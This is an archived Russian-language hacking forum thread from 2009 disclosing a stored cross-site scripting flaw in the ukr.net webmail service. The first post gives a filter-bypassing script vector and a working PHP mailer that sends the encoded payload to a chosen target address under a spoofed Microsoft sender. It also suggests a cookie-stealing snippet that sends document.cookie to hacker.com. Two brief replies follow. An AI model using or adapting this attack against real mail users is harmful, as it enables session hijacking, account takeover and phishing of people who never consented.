ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Active XSS [ukr.net]
  #1  
Старый 14.05.2009, 23:55
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
По умолчанию Active XSS [ukr.net]

Всем привет) На днях исследовал почту ukr.net'a Хотя нет, начну с того что мне жаль было постить это в паблике, так как проверено, быстро пофиксят.

Вообщем смотря сорцы одного из писем, я заметил что контент весь в :

Код:
<script>
	messageBody = '\nPew pew!';
	readmsgSetMessageBody();	
	</script>
Это уже выдвигало на некии мысли. Покопавшись еще чуть я остановился на таком вот векторе:

Код:
<font style="background:url\(javas/**/cript:eval(String.fromCharCode([evil encoded code])))">
Opera: [-]
IE: [+]
FF: [-]

Небольшой скриптик для отправки:
PHP код:
<?php
/**
 * (c) Dimi4, 2009
 * 
*/   
$target "petya@ukr.net";
$subj "Pew pew!";
$payload ="";
$evilcode="alert(1);"//img = new Image(); img.src = "http://hacker.com/sniffer/s.gif?"+document.cookie;
$strlenstrlen($evilcode);
        for(
$i=0$i !== $strlen$i++)
        {
            if(
$i+== $strlen$payload .= ord($evilcode[$i]);
            else 
$payload .= ord($evilcode[$i]).',';
        }
$header  "From: support@microsoft.com\r\n";
$header .= "MIME-Version: 1.0\r\n";
$header .= "Content-Type: text/html\r\n";
$msg ='<font style="background:url\(javas/**/cript:eval(String.fromCharCode('.$payload.')))">';
mail($target,$subj,$msg,$header);
?>
Собстна меняем $target на нужное мыло, и $evilcode на ченить хекерское, например имедж со снифером:
Код:
img = new Image(); img.src = "http://hacker.com/sniffer/s.gif?"+document.cookie;
 
Ответить с цитированием

  #2  
Старый 04.06.2009, 00:29
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

from roa
__________________
..
 
Ответить с цитированием

  #3  
Старый 04.06.2009, 00:53
Exlibris
Постоянный
Регистрация: 26.02.2007
Сообщений: 495
Провел на форуме:
3835614

Репутация: 1386
Отправить сообщение для Exlibris с помощью ICQ
По умолчанию

good блин хакер =(
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Irokez Blog BLIND SQL-INJECTION, INCLUDE, ACTIVE XSS Corwin Сценарии/CMF/СMS 1 19.09.2009 14:01
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
Active XSS in Invision Power Board 2.1.4 k00p3r Уязвимости 8 03.03.2006 20:51
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ